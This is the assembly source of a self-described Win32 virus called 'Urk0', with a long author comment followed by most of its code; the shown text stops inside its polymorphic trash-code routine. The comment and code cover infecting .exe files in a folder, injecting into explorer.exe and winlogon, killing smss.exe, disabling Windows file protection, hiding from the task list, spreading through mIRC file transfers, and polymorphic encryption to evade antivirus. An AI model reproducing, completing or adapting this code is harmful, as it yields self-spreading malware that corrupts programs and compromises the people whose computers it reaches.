;THIS IS A VIRUS SOURCE CODE.NOW,THIS FILE ITS NOT DANGER.IM NOT RESPONSABLE OF DAMAGES ;IN CASE YOU COMPILE AND LINK IT TO CREATE A EXECUTABLE.THIS CODE IS ONLY FOR ENTERTAIMENT ;AND EDUCATION. ;I KNOW THIS CODE COULD TO HAVE (AND IM 99% SURE IT HAS) BUGS. I CODED IT ONLY FOR ;FUN, I NO WANT THIS VIRUS INFECTED COMPUTERS UNLESS YOU DID IT FOR UR ELECTION SO ;IM NOT REALLY WORRIED COZ THIS VIRUS IS NOT DONE FOR CORRUPT A SYSTEM. ; ;win32.Urk0 (Lady Marian 3) ;This is a Win32 virus. ; ;Win9x: ;It uses a method that i havent seen in other viruses.Second part of virus(where it ;polymorphs decryptor,infects,...) is descrypted and copied directly to other process ;that previously it creates(ill try it was a process created from a random file but for ;now it do it with explorer.exe) suspended.Then it unprotect mem of primary module of ;process with VirtualProtectEx and overwrite process mem with its code since entrypoint ;of new process.Then we reanude thread of created process so virus is executed in other ;process.This can be made MAX_DEPTH times.Explorer creates other process and inject there ;its code,and again and again and again...for MAX_DEPTH times. ;I think this difficults emulation and debugging.In addition if a ;memory monitor detects a virus behaviour in memory it detects virus as other file ;(for now explorer.exe). ;Note virus never infects explorer.exe in disk,only in memory,so if virus is searched in ;explorer.exe it is not found.In addition when i create new process i pass ;CREATE_NEW_PROCESS_GROUP flag so new process is created without father... ;suppostly there isnt relation between creator process and new process. ;In addition when virus is executing in explorer.exe it calls to RegisterServiceProcess ;so user doesnt see two explorer.exe in task list. ;With this method we return the control to host fastly becoz slow part of virus is executed ;currently with host becoz it is executing in explorer.exe where we are injected our code. ;First part of virus is encrypted.Decryptor is polimorphed.Key is changed with each generation. ;Polymorphic engine its not very complex.It interchanges registers used and inserts ;trash instructions.Trash uses recursively itself so we can find trash in this manner: ; ;xor reg32a,imm32a___ ;add reg32b,imm32b_ | ;cli | | ;clc | | ;sub reg32b,imm32b_| | ;cli | ;cpuid | ;... | ;xor reg32a,imm32a___| ;... ; ;I wanna do it better with a v2.0 of the virus :P ;Second part is encrypted with random key.Decryptor its not poly.However,virus doesnt ;modify its code directly becoz it,while is injecting code to explorer.exe,is ;unencrypting bytes before injecting. ;It uses EPO method too.Insert a jmp(and ill insert some antidebugging trickz too) ;in entrypoint of infected file(later it restores bytes overwrited). ;Apis are gotten by CRC. ;For infection it adds itself at end of last section.Increase size of file infected. ;It only infects .exe files. ;For now Urk0 doesnt have payload(i dont know if i ll add it :-m ) ;In addition Urk0 has two manners of infection.It can infect files with explorer code ;encrypted or withouth encrypting.If it isnt encrypted it have per-process characteristics. ;It works in the same manner but in addition it hooks CreateFileA api. ;It always infects mirc.exe file with per-process characteristics becoz mirc.exe use ;CreateFileA to open files that it will send(with dcc) so ill infect files before sending ;and in this manner virus will arrive other computer ;)(With mirc.exe and others similar). ;If you read this code you will see i have spend a lot of bytes that i could have not ;spend it,becoz for now i have not optimizated the code.I must optimizate it and ;optmizate poly engine. ;Structure of code: ; ; --------------------------------------SVirus ; -----------------------SCode ; (Entry point 2) ; Code executed ; after injecting ; in explorer.exe ; Encrypted with random. ; Note if this part is ; not encrypted some code ; here can be executed ; before injecting to ; explorer for ; perprocess propose ; -----------------------ECode ; (Entry point 1) ; Decryptor of code since ; Encrypted to EVirus ; -----------------------Encrypted ; Here it creates process ; explorer.exe and injects ; code(unencrypting SCode ; to ECode at same time it ; write each dword) to ; explorer.exe since entry ; point of it.When it has ; injected the code it reanude ; explorer and infection part ; and others important parts ; are executed in explorer.exe ; process. ; Later it restore for EPO ; overwrited bytes and jmp ; to host ; --------------------------------------EVirus ; ;WinNT: ;In NT machines virus works in a manner very different.In Nt,virus will try to get a ;handle to winlogon.exe with full privileges,using a flaw in dbgss implemented in smss.exe ;(you can see debploit flaw in august archives,Nt focus,www.securiteam.com).Using this flaw ;we inject our code in winlogon.Note that with this flaw we have a problem,when we try to get ;a handle to winlogon with debploit method,winlogon will terminate when our program ;terminate too,becouse our program set as debugger of winlogon,and winlogon as debuggee, ;so if we attach winlogon,when we terminate,it will terminate too.For this reason,winlogon ;code will kill smss.exe.Ok,this is a dramatic solution,however i think system will work ;very well without smss.exe.Smss.exe loads winlogon.exe and user mode part of win32 ss ;in memory,and when system hangs,it takes control and show typical blue screen.In addition, ;it have implemented dbgss so if we kill it,a lot of debugger will not run(mmm...is this a ;problem??? ;).I was working a lot of time in my system with smss.exe terminated and i think ;my system worked perfectly(i wasnt be able to use debuggers...only softice). ;well,when winlogon code kills smss.exe,it disables sfp with ratter and benny method(29a ;number 6).Later it gets a handle to explorer and injects the code there.In explorer, ;virus will infect current folder of explorer.exe in intervals of 60 seconds. ;Note virus use ModuleBase + 28h for infection mark.At this offset there are 5 reserved dwords ;in dos header.I think to put infection mark in this field is a few lame :P ... i could ;to have put it in second field of time date stamp or with others methods but im not worry ;for infection mark. ; ; ;and that is all :) ; ; ;SORRY BECOZ MY ENGLISH LEVEL ITS VERY LOW SO I M SORRY IF YOU DONT UNDERSTAND SOME ;EXPRESSIONS THAT I USE BADLY.HOWEVER ILL TRY TO WRITE BETTER I CAN :) ; ;I MUST TO APOLOGIZE TOO COZ MY BADLY MANNER OF PROGRAMMING. MY CODE IS NOT OPTIMIZED ;FOR FAST AND NOT OPTIMIZED FOR SIZE :P . IN ADDITION THIS IS A CRAZY CODE :S ;REALLY,IF I HAD TO READ IT I WOULD BE VERY ANGRY WITH THE AUTHOR :P COZ PERHAPS THE CODE ;IS NOT VERY MUCH UNDERSTANDABLE. SORRY . ; ; ;THX TO: ; ;OF COURSE: � XEZAW ! My dear m3Nt0r - THX.exp 99 :) He shows with lot of pacience ;to this poor person (me) all i know. Ill never be able to pay u all u have done for me :) ;MsCorlib who always helps me too :) a half of this virus is your ;) You are other m3Nt0r ;for me. In addition u know all things that i ask u O_O u r a genius :) ;GriYo who always helps me too.Though not directly,you are a m3Nt0r for me too :) with ;your viruses.I love Dengue :),its a bible for me ;) ;Benny&Ratter,thx for that fantastic codes as Joss,ketamine,dob,all ratter's articles ;about windows, sfc disable :) and all all all ;) thx. ;My good friends VirusBust,ViR[-_-],isotope,Pato,Nightmare ;_HangMan_ & Oyzzo ;) my dear msdos lovers :D ;And all people in #asm,#win32asm,#win32,#ensamblador and #virus in irc hispano ;who helped me :) ;Well,i must put here a endless list of 'THX TO' becoz a lot of people have helped me,so ;ill only say thx all :*** and of course,if someone need me im here ;) ;And a infinitely 'THX TO' for LADY MARIAN: my Dark Angel,my Black Lotus,my Takhisys, ;my Queen Of Darkness,... :******************************************************* ;Who is Urko? ;Urko is a dog. Urko is one of my best friends. Urko is a fantastic dog becoz sometimes..... ;Urko SPEAKS! Urko is very timid and only speaks to me...and not always...urko only ;speaks when both,urko and me,we start to smoke that rare cigarretes that urko has. Then ;urko start to speak a lot of :) and we stay all night speaking,smoking and seeing films or ;playing trivial pursuit,or coding,or doing a lot of things :) ;Due this,i named this virus as win32.urk0 :) .586p .model flat,stdcall extrn ExitProcess:proc extrn GetLastError:proc extrn GetTickCount:proc extrn GetModuleHandleA:proc extrn OpenProcess:proc ;macros ;;;;;;;;;;;;;;;;;;;;;;; callz macro dir_call db 0E8h dd (dir_call - $ - 4) endm ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; jmpz macro dir_call db 0E9h dd (dir_call - $ -4) endm ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; CalcLenString macro local loopin push esi dec esi loopin: inc esi cmp byte ptr[esi],0 jne loopin mov ecx,esi pop esi sub ecx,esi endm ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; GezApi macro BaseKernel,ApiCRC,ApiNameLen mov eax,BaseKernel mov edx,ApiCRC mov ebx,ApiNameLen callz GetApi endm ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; GezSyscall macro BaseNtdll,ApiCRC,ApiNameLen GezApi BaseNtdll,ApiCRC,ApiNameLen mov eax,[eax + 1] endm ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; syscallz macro fc,paramz ;from Ratter's win2k.Joss mov eax,fc lea edx,[esp] int 2eh add esp,(paramz*4) endm ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; Writez macro BaseKernel,hProcess,OffsetInProc,Buffer,Size push 0 mov [esp],esp ;for storing number of writted bytes push Size push Buffer push OffsetInProc push hProcess GezApi BaseKernel,WriteMemoryProcessCRC,WMPNameLen call eax endm ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; Readz macro BaseKernel,hProcess,OffsetInProc,Buffer,Size push 0 mov [esp],esp ;for storing number of read bytes push Size push Buffer push OffsetInProc push hProcess GezApi BaseKernel,ReadMemoryProcessCRC,RMPNameLen call eax endm ;;;;;;;;;;;;;;;;;;;;;;; .data ;some datas for first generation kernel32dll db 'kernel32.dll',0 auxi dd 0 az db 'Sleep',0 azz db 'ContinueDebugEvent',0 .code start: ;vvvvvvvvvvvvvvvvvvvFIRST GENERATION CODE jmpz jmpedSize db '*Virus size' virSize = EVirus - SVirus db 0 dw virSize and 0FF00h db virSize and 00FFh db 0 jmpedSize: ;for getting apis crcs: lea esi,az CalcLenString mov edi,ecx call CRC32 lea esi,azz CalcLenString mov edi,ecx call CRC32 ;i unprotect code: push offset kernel32dll call GetModuleHandleA push eax mov esi,offset SVirus mov ecx,EVirus - SVirus xor ebx,ebx callz UnprotectMem pop eax mov [kernel],eax pushad xor ebp,ebp ;ill test poly callz Poly mov eax,[CryptKey] mov auxi,eax popad ;I crypt necesary parts call GetTickCount or eax,0FFFF0000h mov ecx,((ECode - SCode)/4)-1 inc ecx Cryptit: dec ecx xor dword ptr [SCode + 4*ecx],eax or ecx,ecx jnz Cryptit mov eax,auxi callz DkRyPtIt_ DkRyPtIt_: pop esi add esi,Encrypted - DkRyPtIt_ mov ecx,((EVirus - Encrypted)/4) GoGoGo_: xor dword ptr [esi + ecx*4 - 4],eax dec ecx or ecx,ecx jnz GoGoGo_ jmpz MyEntryPoint ;^^^^^^^^^^^^^^^^^^^FIRST GENERATION CODE ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;vvvvvvvvvvvvvvvvvvvSECOND GENERATION SVirus: ;APIS NAMES CRCS AND LENGHTS LoadLibraryACRC equ 3fc1bd8dh LLNameLen equ 12 CloseHandleCRC equ 0b09315f4h CHNameLen equ 11 FindFirstFileACRC equ 0c9ebd5ceh FFFNameLen equ 14 FindNextFileACRC equ 75272948h FNFNameLen equ 13 FindCloseCRC equ 0d82bf69ah FCNameLen equ 9 GetTickCountCRC equ 5b4219f8h GTCNameLen equ 12 WriteMemoryProcessCRC equ 4f58972eh WMPNameLen equ 18 ReadMemoryProcessCRC equ 0f7c7ae42h RMPNameLen equ 17 ResumeThreadCRC equ 3872beb9h RTNameLen equ 12 ExitProcessCRC equ 251097CCh EPNameLen equ 11 SetFileAttributesACRC equ 156b9702h SFANameLen equ 18 CreateFileACRC equ 553b5c78h CFNameLen equ 11 CreateFileMappingACRC equ 0b41b926ch CFMNameLen equ 18 MapViewOfFileCRC equ 0A89b382fh MVFNameLen equ 13 UnmapViewOfFileCRC equ 391ab6afh UVFNameLen equ 15 SetFileTimeCRC equ 21804a03h SFTNameLen equ 11 GetModuleHandleACRC equ 0B1866570h GMHNameLen equ 16 GetLastErrorCRC equ 0d2e536b7h GLENameLen equ 12 RegisterServiceProcessCRC equ 3b5ef61fh RSPNameLen equ 22 SetCurrentDirectoryACRC equ 69b6849fh SCDNameLen equ 20 GetCurrentDirectoryACRC equ 0c79dc4e3h GCDNameLen equ 20 GetWindowsDirectoryACRC equ 0fff372beh GWDNameLen equ 20 GetModuleFileNameACRC equ 08bff7a0h GMFNameLen equ 18 CreateProcessACRC equ 0a851d916h CPNameLen equ 14 Module32FirstCRC equ 38891c00h M32FNameLen equ 13 Module32NextCRC equ 0f6911852h M32NNameLen equ 12 CreateToolhelp32SnapShotCRC equ 0c1f3b876h CT32SNameLen equ 24 VirtualProtectExCRC equ 5d180413h VPNameLen equ 16 GetCurrentProcessCRC equ 0d0861aa4h GCPNameLen equ 17 OpenProcessTokenCRC equ 0f9c60615h OPTNameLen equ 16 LookupPrivilegeValueACRC equ 0da87bf62h LPVNameLen equ 21 AdjustTokenPrivilegesCRC equ 0de3e5cfh ATPNameLen equ 21 EnumProcessesCRC equ 0509a21ch EPSNameLen equ 13 EnumProcessModulesCRC equ 0dea82ac2h EPMNameLen equ 18 GetModuleInformationCRC equ 0f2a84636h GMINameLen equ 20 SuspendThreadCRC equ 0bd76ac31h STNameLen equ 13 FreeLibraryCRC equ 0da68238fh FLNameLen equ 11 GetVersionCRC equ 4ccf1a0fh GVNameLen equ 10 RasDialACRC equ 0b88da156h RDNameLen equ 8 GetModuleBaseNameACRC equ 1720513eh GMBNNameLen equ 18 OpenProcessCRC equ 0df27514bh OPNameLen equ 11 ZwConnectPortCRC equ 0cbaec255h ZCPNameLen equ 13 NtConnectPortCRC equ 0c88edce9h NCPNameLen equ 13 ZwRequestPortCRC equ 0e28aebd1h ZRPNameLen equ 13 DbgUiConnectToDbgCRC equ 09a51ac3ah DUCTDNameLen equ 17 DbgSsInitializeCRC equ 0d198b351h DSINameLen equ 15 DbgSsHandleKmApiMsgCRC equ 2e9c4e99h DSHKAMNameLen equ 19 GetCurrentProcessIdCRC equ 1db413e3h GCPINameLen equ 19 GetCurrentThreadIdCRC equ 8df87e63h GCTINameLen equ 18 WaitForDebugEventCRC equ 96ab83a1h WFDENameLen equ 17 ContinueDebugEventCRC equ 0d8e77e49h CDENameLen equ 18 VirtualAllocExCRC equ 0e62e824dh VANameLen equ 14 CreateRemoteThreadCRC equ 0ff808c10h CRTNameLen equ 18 NtTerminateProcessCRC equ 94fcb0c0h NTPNameLen equ 18 ExitThreadCRC equ 80af62e1h ETNameLen equ 10 GetCurrentDirectoryWCRC equ 334971b2h GCDWNameLen equ 20 FindFirstFileWCRC equ 3d3f609fh FFFWNameLen equ 14 SleepCRC equ 0CEF2EDA8h SNameLen equ 5 Kernel32CRC equ 204c64e5h ;CRC of 'kernel32' string ERROR_NO_MORE_FILES equ 18 PAGE_EXECUTE_READWRITE equ 40h MEM_COMMIT equ 00001000h MEM_RESERVE equ 00002000h STARTUPINFOSIZE equ 68 PROCESSINFORMATIONSIZE equ 16 CREATE_SUSPENDED equ 4 DEBUG_PROCESS equ 1 CREATE_NEW_PROCESS_GROUP equ 200h TH32CS_SNAPMODULE equ 8 SNAPSHOT equ 16 ;config constants MAX_DEPTH equ 1 ;min depth,for now INFECTION_PROBABILITY equ 8 ;values 0 - 7...if value > 7 always infects.If 0 never. PER_PROCESS_PROBABILITY equ 8 ;values 0 - 7...if value > 7 never infects with per-process ;characteristic.If 0 always with per-process. WORK_IN_NT equ 1 ;if WORK_IN_NT == 1,virus works in NT and try to do ;some specifics things for NT.If 0,virus exits if NT. SCode: ;when we infect in memory the explorer process injecting our code the execution begins here ;This code is encrypted with random key each 4 bytes callz d_offsetz ;first byte is E8000000h when uncrypted d_offsetz: pop ebp sub ebp,offset d_offsetz pop eax push eax xor ax,ax add eax,1000h ;eax -> a part of kernel32 SearchKernelz: sub eax,1000h cmp word ptr [eax],'ZM' jne SearchKernelz mov [ebp + kernel],eax ;we set our process as service process. push eax GezApi eax,RegisterServiceProcessCRC,RSPNameLen push 1 push 0 call eax pop eax ;we will setup a SEH frame and if a error occurs nobody know it :D lea esi,[ebp + ExplorerEnd] push esi push dword ptr fs:[0] mov fs:[0],esp ;we set the SEH frame ;note its not necessary our handler ;restore SEH becoz we will terminate ;the process ;we repeat the process of injection of code in explorer MAX_DEPTH times.When we have loaded ;and infected explorer at MAX_DEPTH time then it's executed file infection zone. ;I think it will be more difficult for avs with this trap. cmp dword ptr [ebp + ExplorerDepth],MAX_DEPTH je Explorer2 add dword ptr [ebp + ExplorerDepth],1 callz InjectToExplorer GezApi eax,ExitProcessCRC,EPNameLen push 0 call eax ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;This code is executed in the last explorer.exe what we have injected our code Explorer2: ;eax = Base of Kernel ;ebp = d_offset mov dword ptr [ebp + ExplorerDepth],0 ;this is the last explorer injection ;now ill infect all files .exe in Current folder callz InfectCurrentFolder ExplorerEnd: callz DoffEnd DoffEnd: pop ebp sub ebp,offset DoffEnd mov eax,[ebp + kernel] ;eax = kernel base GezApi eax,ExitProcessCRC,EPNameLen push 0 ;eax -> ExitProcess call eax ;;;;;;;;;;;;;;;;;;;;;; kernel dd 0 CryptKey dd 0 ExplorerDepth dd 0 FILETIME struct FT_dwLowDateTime dd ? FT_dwHighDateTime dd ? FILETIME ends WIN32_FIND_DATA: WFD_dwFileAttributes dd ? WFD_ftCreationTime FILETIME <?> WFD_ftLastAccessTime FILETIME <?> WFD_ftLastWriteTime FILETIME <?> WFD_nFileSizeHigh dd ? WFD_nFileSizeLow dd ? WFD_dwReserved0 dd ? WFD_dwReserved1 dd ? WFD_szFileName db 260 dup (?) WFD_szAlternateFileName db 16 dup (?) ;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;InfectCurrentFolder infects files with mask in files variable in current folder ;in: ; none ;out: ; none ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; InfectCurrentFolder: callz Poly ;we poly the decryptor overwriting code with new decryptor for ;the moment when we will infect a file ;here begins zone where we will infect files ;if all things are in order,current directory for memory-infected explorer ;is the same as file.exe that contains virus. lea eax,[ebp + WIN32_FIND_DATA] push eax lea eax,[ebp + files] push eax mov eax,[ebp + kernel] GezApi eax,FindFirstFileACRC,FFFNameLen call eax mov [ebp + SearchHand],eax jmpz TestTypeOfInfection MoreFiles: ;) callz Poly ;poly again so each infected file will be different lea eax,[ebp + WIN32_FIND_DATA] push eax push dword ptr [ebp + SearchHand] mov eax,dword ptr [ebp + kernel] GezApi eax,FindNextFileACRC,FNFNameLen call eax TestTypeOfInfection: or eax,eax je EndCurrentFolderInfection mov eax,[ebp + kernel] GezApi eax,GetTickCountCRC,GTCNameLen call eax and eax,7 cmp eax,INFECTION_PROBABILITY ;probability of infection.By default always. jge MoreFiles mov eax,[ebp + kernel] GezApi eax,GetTickCountCRC,GTCNameLen call eax mov ecx,eax mov ebx,eax rol ebx,cl and ebx,7 xor eax,eax cmp ebx,PER_PROCESS_PROBABILITY ;probability of per-process.By default never. jge WithPerProcess inc eax WithPerProcess: push eax callz TestFile or eax,eax jnz PerProcessOrNoInfect pop eax GoInfectIt: callz InfectIt jmpz MoreFiles PerProcessOrNoInfect: dec eax or eax,eax jz ForcePerProcess ;if no force perprocess and no normal,then -1 and no infect so more files pop eax jmpz MoreFiles ForcePerProcess: pop ebx jmpz GoInfectIt EndCurrentFolderInfection: ret ;;;;;;;;;;;;;;;;;;;;;;;; files db '*.exe',0 SearchHand dd 0 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;InfectIt uses WIN_FIND_DATA for infecting file which information is contained in that struc ;in: ; eax = 0 without encryption(but with perprocess enable) eax = 1 with encryption(but ; no enabled perprocess) ;out: ; none ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; InfectIt: mov [ebp + Encryption],eax pushad callz MapFile or eax,eax jz EndInfection mov eax,[ebp + WFD_nFileSizeLow] add eax,EVirus - SVirus mov [ebp + FileInfectedSize],eax mov ebx,[ebp + ViewHandle] cmp word ptr [ebx],'ZM' jne CloseAndBye cmp word ptr [ebx + 8],4h jne CloseAndBye mov edi,[ebx + 3ch] add edi,ebx cmp word ptr [edi],'EP' jne CloseAndBye cmp word ptr [ebx + 28h],'Zv';my infection mark je CloseAndBye mov ax,[edi + 16h] test ax,2 ;yes IMAGE_FILE_EXECUTABLE_IMAGE je CloseAndBye test ax,1000h ;no IMAGE_FILE_SYSTEM jne CloseAndBye test ax,2000h ;no IMAGE_FILE_DLL jne CloseAndBye mov ax,[edi + 5ch] test ax,1 ;no IMAGE_SUBSYSTEM_NATIVE jne CloseAndBye ;we have a file executable in PE format and not infected by this virus so ill continue ;with infection.In addition is not a system file. mov edi,dword ptr [edi + 3ch];file alingment mov dword ptr [ebp + FileAlignment],edi AlignSize: mov eax,[ebp + FileInfectedSize] xor edx,edx div edi inc eax ;we divide size/alignment and inc result for knowing the new number of blocks ;and next we multiplicate number of blocks x size of block mul edi mov [ebp + WFD_nFileSizeLow],eax ;for in next mapping will be mapped file size + space for vir callz CloseAll callz MapFile ;with size to allocate virus or eax,eax jz EndInfection ;now we have file mapped with enought space at end of file to append there our virus ;) mov ebx,[ebp + ViewHandle] mov word ptr [ebx + 28h],'Zv';infection mark mov eax,[ebx + 3ch];lfanew add ebx,eax;ebx -> PE mov eax,[ebx + 28h] mov [ebp + OldEntryPoint],eax xor eax,eax mov ax,[ebx + 6];number of sections mov [ebp + Sections],eax xor eax,eax mov ax,word ptr [ebx + 14h] add ebx,18h add ebx,eax mov ecx,[ebp + Sections] dec ecx mov [ebp + FirstSection],ebx LastSection: add ebx,28h loop LastSection ;we have ebx -> last section mov [ebx + 24h],0A0000020h ;section is executable,readable,writable and with code mov eax,[ebx + 10h];size of raw data add eax,[ebx + 0ch];add size + RVA of section. add eax,MyEntryPoint - SVirus ;eax = New Entry Point sub eax,dword ptr [ebp + OldEntryPoint] sub eax,EPOCodeSize mov [ebp + EPOrel32],eax mov eax,[ebx + 10h];size of raw data add eax,[ebx + 14h];add size + pointer to raw data of section.We are in the end of last section ;We must copy there our code ;) mov [ebp + EndLastSection],eax mov esi,ebx ;now we must alignment section mov eax,[esi + 10h];size of raw add eax,EVirus - SVirus mov edi,[ebp + FileAlignment] xor edx,edx div edi inc eax mul edi mov [esi + 10h],eax;new sizeofrawdata mov [esi + 8],eax;new VirtualSize add eax,dword ptr [esi + 0ch];size + virtual address mov ebx,[ebp + ViewHandle] mov ecx,[ebx + 3ch];lfanew add ebx,ecx;ebx -> PE mov [ebx + 50h],eax;new size of image EPOzone: ;well,we have modified executable for introducting our code.Here we can modify ;entry point for pointing to our code but i think EPO methods its more efective. ;first all i must search the entry point,but no when file is executing,i must search ;raw entry point,entry point in file.There i must copy EPOCode. mov ecx,[ebp + Sections] mov ebx,[ebp + FirstSection] mov esi,[ebp + OldEntryPoint] FindCodeSec: mov eax,[ebx + 0ch] add eax,[ebx + 10h];eax -> end of this section cmp eax,esi jg FoundCodeSec add ebx,28h loop FindCodeSec FoundCodeSec: ;ebx ->header of section with entry point sub esi,dword ptr [ebx + 0ch] add esi,dword ptr [ebx + 14h];raw_e_point = e_point - VASection + PointerToRawDataSection mov [ebp + OldRawEntryPoint],esi add esi,[ebp + ViewHandle] push esi lea edi,[ebp + EPORestoreBytes] mov ecx,EPOCodeSize push ecx rep movsb pop ecx pop esi lea edi,[ebp + SEPOCode] xchg esi,edi rep movsb ;now we have copied bytes for EPO to entrypoint and old bytes to EPORestoreBytes for ;restoring when we return to host ;now we must copy virus code (encrypting necesary parts) to EndLastSection mov edi,[ebp + EndLastSection] add edi,dword ptr [ebp + ViewHandle] push edi lea esi,[ebp + SVirus] mov ecx,EVirus - SVirus rep movsb mov eax,[ebp + kernel] GezApi eax,GetTickCountCRC,GTCNameLen call eax pop edi or eax,0FFFF0000h cmp dword ptr [ebp + Encryption],0 jne YesEncrypt xor eax,eax YesEncrypt: mov ecx,((ECode - SCode)/4)-1 inc ecx CryptitExplorerCode: dec ecx xor dword ptr [edi + 4*ecx],eax or ecx,ecx jnz CryptitExplorerCode add edi,Encrypted - SCode mov eax,[ebp + CryptKey] mov ecx,((EVirus - Encrypted)/4)-1 inc ecx CryptitFirstCode: dec ecx xor dword ptr [edi + 4*ecx],eax or ecx,ecx jnz CryptitFirstCode CloseAndBye: callz CloseAll EndInfection: popad ret ;;;;;;;;;;;;;;;;;;;;;; FileHandle dd 0 MappingHandle dd 0 ViewHandle dd 0 FileInfectedSize dd 0 FileAlignment dd 0 Sections dd 0 FirstSection dd 0 EndLastSection dd 0 OldRawEntryPoint dd 0 Encryption dd 0 ;;;;;;;;;;;;;;;;;;;;;;;; SEPOCode: db 0E9h ;rel jmp to our code EPOrel32 dd 0 EEPOCode: EPOCodeSize equ EEPOCode - SEPOCode ;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;; MapFile: ;it maps the file in WIN32_FIND_DATA ChangeAttributesOfFile: lea edi,[ebp + WFD_szFileName] push 80h push edi mov eax,[ebp + kernel] GezApi eax,SetFileAttributesACRC,SFANameLen call eax push 0 push 0 push 3 push 0 push 1 push 0C0000000h ;read and write access to file lea eax,[ebp + WFD_szFileName] push eax mov eax,[ebp + kernel] GezApi eax,CreateFileACRC,CFNameLen call eax inc eax or eax,eax jnz np1 ret np1: dec eax mov [ebp + FileHandle],eax push 0 mov eax,[ebp + WFD_nFileSizeLow] push eax push 0 push 4 push 0 push dword ptr [ebp + FileHandle] mov eax,[ebp + kernel] GezApi eax,CreateFileMappingACRC,CFMNameLen call eax or eax,eax jz CloseFile mov [ebp + MappingHandle],eax push dword ptr [ebp + WFD_nFileSizeLow] push 0 push 0 push 000F001Fh push eax mov eax,[ebp + kernel] GezApi eax,MapViewOfFileCRC,MVFNameLen call eax or eax,eax jz CloseMapping mov [ebp + ViewHandle],eax ret ;;;;;;;;;;;;;;;;;;;;;; CloseAll:;close file opened with MapFile push eax mov eax,[ebp + kernel] GezApi eax,UnmapViewOfFileCRC,UVFNameLen push dword ptr [ebp + ViewHandle] call eax pop eax CloseMapping: push eax mov eax,[ebp + kernel] GezApi eax,CloseHandleCRC,CHNameLen push dword ptr [ebp + MappingHandle] call eax pop eax CloseFile: RestoreAttributes: push eax lea eax,dword ptr [ebp + WFD_ftLastWriteTime] push eax lea eax,dword ptr [ebp + WFD_ftLastAccessTime] push eax lea eax,dword ptr [ebp + WFD_ftCreationTime] push eax push dword ptr [ebp + FileHandle] mov eax,[ebp + kernel] GezApi eax,SetFileTimeCRC,SFTNameLen call eax mov eax,[ebp + kernel] GezApi eax,CloseHandleCRC,CHNameLen push dword ptr [ebp + FileHandle] call eax pop eax ret ;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;Poly creates a decryptor rutine overwriting code since MyEntryPoint to Encrypted ; ;in: ; none ;out: ; none ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Poly: pushad mov eax,[ebp + kernel] GezApi eax,GetTickCountCRC,GTCNameLen call eax mov [ebp + CryptKey],eax lea edi,[ebp + MyEntryPoint] mov ecx,eax and ecx,0000003Fh push eax;random and eax,00000007h cmp al,4 jne noesp1 inc eax noesp1: mov [ebp + esireg],eax pop eax;random push eax ror eax,4 and eax,00000007h cmp al,4 jne noesp2 inc eax noesp2: cmp eax,dword ptr [ebp + esireg] jne nosame inc eax cmp al,4 jne nosame inc eax nosame: and al,7 mov [ebp + ecxreg],eax mov byte ptr [edi],0E8h inc edi mov dword ptr [edi],0h add edi,4 callz trash callz zpop pop ecx;random push ecx and ecx,00003F00h ror ecx,8 callz trash callz zadd pop ecx;random rol ecx,cl and ecx,00000007h push ecx callz trash callz zmov pop ecx;random2 push edi;jnz must jump here push ecx callz trash callz zxor pop ecx push ecx callz trash callz zdec pop ecx push ecx callz trash pop ecx callz trash callz zor mov word ptr [edi],850Fh ;jne rel32 inc edi inc edi pop ecx; where jnz must jump sub ecx,edi sub ecx,4 mov dword ptr [edi],ecx add edi,4 lea ecx,[ebp + Encrypted] sub ecx,edi callz trash popad ret esireg dd 0 ecxreg dd 0 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;Trash generates unuseful instructions for decryptor ;in: ; edi -> memory where function must write the trash code ; ecx -> bytes to write ;out: ; edi = initial edi + ecx ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; trash: or ecx,ecx jz NoTrash pushad callz randomize popad 